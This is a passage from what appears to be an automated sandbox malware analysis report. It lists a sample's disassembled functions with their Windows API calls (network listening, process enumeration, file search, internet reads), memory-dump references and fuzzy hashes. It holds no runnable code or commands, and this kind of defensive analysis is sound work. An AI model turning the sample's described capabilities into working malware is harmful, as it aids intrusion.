                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E38CA8
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38CB7
                                                                                                                  • bind.WS2_32(00000000,?,00000010), ref: 00E38CD3
                                                                                                                  • listen.WS2_32(00000000,00000005), ref: 00E38CE2
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38CFC
                                                                                                                  • closesocket.WS2_32(00000000), ref: 00E38D10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279440585-0
                                                                                                                  • Opcode ID: 8f5a545b72e08063b5fd91ce1e8f08768d903aa72cc0888d74140d5edd8052e8
                                                                                                                  • Instruction ID: 3adcb983bb9b4e1946d79bfbbeb20a80765bf9cc7d81d6025190a202e7f72775
                                                                                                                  • Opcode Fuzzy Hash: 8f5a545b72e08063b5fd91ce1e8f08768d903aa72cc0888d74140d5edd8052e8
                                                                                                                  • Instruction Fuzzy Hash: AF21D0316002009FCB10EF28DE49B6EBBE9EF48754F249159F956B72D2CB70AD45CB62
                                                                                                                  Function 00E26532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E26554
                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E26564
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E26583
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E265A7
                                                                                                                  • _wcscat.LIBCMT ref: 00E265BA
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E265F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1605983538-0
                                                                                                                  • Opcode ID: b2302f7814033e51883711038ee4378e00e331d4d43e41b77f4e956b27d31439
                                                                                                                  • Instruction ID: 41e8a031aaf6ce5c9e69503bfea3a5767bb50784d4e0a97a14587cf3678b0795
                                                                                                                  • Opcode Fuzzy Hash: b2302f7814033e51883711038ee4378e00e331d4d43e41b77f4e956b27d31439
                                                                                                                  • Instruction Fuzzy Hash: 5C219571904218AFDB10ABA5DC88FEEB7FCAB09304F5015A5E505F7141DBB59F85CB60
                                                                                                                  Function 00E213CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E213DC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen
                                                                                                                  • String ID: ($,2$<2$|
                                                                                                                  • API String ID: 1659193697-916407979
                                                                                                                  • Opcode ID: 846f325e087aa71758ed29e4b29e9e10aa752b38cc1a03c3b74225b0fdc07f10
                                                                                                                  • Instruction ID: bd6d57a19e062fde79ec00421cbbb0ceb009bc0c2f12a0811e6a5e15d920296d
                                                                                                                  • Opcode Fuzzy Hash: 846f325e087aa71758ed29e4b29e9e10aa752b38cc1a03c3b74225b0fdc07f10
                                                                                                                  • Instruction Fuzzy Hash: 29324775A007159FC728DF29D4809AAB7F0FF58314B11D4AEE59AEB3A1D770EA41CB40
                                                                                                                  Function 00E3923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E3A82C: inet_addr.WS2_32(00000000), ref: 00E3A84E
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00E39296
                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00E392B9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4170576061-0
                                                                                                                  • Opcode ID: 576d1dfab287868d025e725a6709e770a49173e8f5d2610d45fa1aaa6e84c68b
                                                                                                                  • Instruction ID: f60ff07ff1a7b701be23cc53288e1ed6d2f74adf552cc04700ffc88548d0625e
                                                                                                                  • Opcode Fuzzy Hash: 576d1dfab287868d025e725a6709e770a49173e8f5d2610d45fa1aaa6e84c68b
                                                                                                                  • Instruction Fuzzy Hash: 3B41C170600204AFDB14AB68CC46E7F77EDEF44764F158448FA56AB2D2CBB49D018BB1
                                                                                                                  Function 00E2EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E2EB8A
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2EBBA
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2EBCF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00E2EBE0
                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E2EC0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2387731787-0
                                                                                                                  • Opcode ID: 0236f273c9640f8f83e06a674c063bc224107e89746eca5cf697cbcac6d6904f
                                                                                                                  • Instruction ID: a01b094b3fd085a5211ee815e0a716d93c8eb878425e27a1ed7913efdaa56779
                                                                                                                  • Opcode Fuzzy Hash: 0236f273c9640f8f83e06a674c063bc224107e89746eca5cf697cbcac6d6904f
                                                                                                                  • Instruction Fuzzy Hash: 9A41F0346043118FCB18DF68D891AAAB3E4FF49324F10855DFA5ADB3A1DB31E940CBA1
                                                                                                                  Function 00E48111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 292994002-0
                                                                                                                  • Opcode ID: 9e723e65fe5c6dae46bd626827373b4cbaf91c908a711f3e59aa5e8c1383c7ab
                                                                                                                  • Instruction ID: 8e37a03d19d4d3ccc052d6832272fb194a198595a416f9bb53a6a1dc453a2dee
                                                                                                                  • Opcode Fuzzy Hash: 9e723e65fe5c6dae46bd626827373b4cbaf91c908a711f3e59aa5e8c1383c7ab
                                                                                                                  • Instruction Fuzzy Hash: E111BF317012106FE7216F26ED44E6FBB9CEF547A4F45542AF84AF7281CF70A90286B5
                                                                                                                  Function 00DE9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                  • API String ID: 0-1546025612
                                                                                                                  • Opcode ID: d29de01f0b8804ad36158caa927a5f146fafb8a90ba48e2b80724ad29026188f
                                                                                                                  • Instruction ID: e2c8b964af15a3053a626002f17c08f67aae4a4e1034574a1afe2b1716803c35
                                                                                                                  • Opcode Fuzzy Hash: d29de01f0b8804ad36158caa927a5f146fafb8a90ba48e2b80724ad29026188f
                                                                                                                  • Instruction Fuzzy Hash: 08929B71E0125ACBDF24DF59C8907BDB7B1AF54354F24819AE85AFB280D730AD81CBA1
                                                                                                                  Function 00E4F1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4F211
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E5E4C0,?,?,?,?,?), ref: 00E4F226
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E4F270
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E5E4C0,?,?,?), ref: 00E4F2A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423138444-0
                                                                                                                  • Opcode ID: 2f8212bcee77d47b2290685ddb5438fbd46eb0b64bd4412a29b4d762beb63522
                                                                                                                  • Instruction ID: d3dc01e41dec1b61166b9c8dbb6d5ff4070ed60bb851eea0624307ee82ccba10
                                                                                                                  • Opcode Fuzzy Hash: 2f8212bcee77d47b2290685ddb5438fbd46eb0b64bd4412a29b4d762beb63522
                                                                                                                  • Instruction Fuzzy Hash: BA21A039600028EFCB158F95EC58EFE7BB5EF4AB54F088469F905AB2B1D3709950DB60
                                                                                                                  Function 00DFB55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 00DFB5A5
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00E5E69A
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E5E6A4
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00E5E6AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010295502-0
                                                                                                                  • Opcode ID: a351b82335458b61ab289159f1e20350aae6d76696163e9455b0b4db15f39f53
                                                                                                                  • Instruction ID: 64564fb0c9d7bbc9ead9b6bc8b3555be65a3bb79a2621a1540aa0d079e03fe47
                                                                                                                  • Opcode Fuzzy Hash: a351b82335458b61ab289159f1e20350aae6d76696163e9455b0b4db15f39f53
                                                                                                                  • Instruction Fuzzy Hash: 4D112531A04029BFCB149F98DC458BE77B8EB49319F414452EA42E7240D774AA99CBB1
                                                                                                                  Function 00DFB11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DFB22F
                                                                                                                    • Part of subcall function 00DFB55D: NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000), ref: 00DFB5A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_$LongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1155049231-0
                                                                                                                  • Opcode ID: c2fc8afdb8a3940f5640f4d43dc7e49e8a9f9fdb73aed6a31bd5ef75d9adbc30
                                                                                                                  • Instruction ID: 83951c6cc0154132f24196f0f800d0c2dc752efd6ef10bcf89a1b3331b68b289
                                                                                                                  • Opcode Fuzzy Hash: c2fc8afdb8a3940f5640f4d43dc7e49e8a9f9fdb73aed6a31bd5ef75d9adbc30
                                                                                                                  • Instruction Fuzzy Hash: E4A1AA7010410CFAD72C6F2ADC88D7F299CEB86365F1AC51BFA81F6292CB15DE049276
                                                                                                                  Function 00E34EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E343BF,00000000), ref: 00E34FA6
                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E34FD2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 599397726-0
                                                                                                                  • Opcode ID: d783361ebc0b5fe953768603f2e53f077a340e9c0960785d4031039b7bdbb63d
                                                                                                                  • Instruction ID: d06f947204fd5b1e3776be68bc010fa63927bb5ebcb9470f563a1299d60febfb
                                                                                                                  • Opcode Fuzzy Hash: d783361ebc0b5fe953768603f2e53f077a340e9c0960785d4031039b7bdbb63d
                                                                                                                  • Instruction Fuzzy Hash: 8341FAB2604309BFEB208E90DC89EBF7BBCEB40358F14605EF205761C1D671AE41DAA0
                                                                                                                  Function 00DE77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: \Q
                                                                                                                  • API String ID: 4104443479-1011046347
                                                                                                                  • Opcode ID: 6821d9771031627f7828e900fb360c2b3d0192cfc7a98725a1a224065115f8e0
                                                                                                                  • Instruction ID: 936b9b60b4ba3895d44950490528cbf7a964b69e701698d3d8f0558cb9f8529a
                                                                                                                  • Opcode Fuzzy Hash: 6821d9771031627f7828e900fb360c2b3d0192cfc7a98725a1a224065115f8e0
                                                                                                                  • Instruction Fuzzy Hash: 83A26C70E04259CFDB24DF59C8806ADBBB1FF48354F2581AAD859AB391D7309E81DFA0
                                                                                                                  Function 00E2E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E2E20D
                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E2E267
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E2E2B4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1682464887-0
                                                                                                                  • Opcode ID: 5db86270e9abae26ebba7fc7f0d14ad5f667ead771957aee95f2e91946ac1639
                                                                                                                  • Instruction ID: 8ba0badbc412ac86bfa7892aa6e4a04efad958123762774456934527f8a33caf
                                                                                                                  • Opcode Fuzzy Hash: 5db86270e9abae26ebba7fc7f0d14ad5f667ead771957aee95f2e91946ac1639
                                                                                                                  • Instruction Fuzzy Hash: 63213235A00118DFCB00EF95D895AEDFBF8FF49314F1584AAE905A7351DB719905CB60
                                                                                                                  Function 00E1B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                    • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
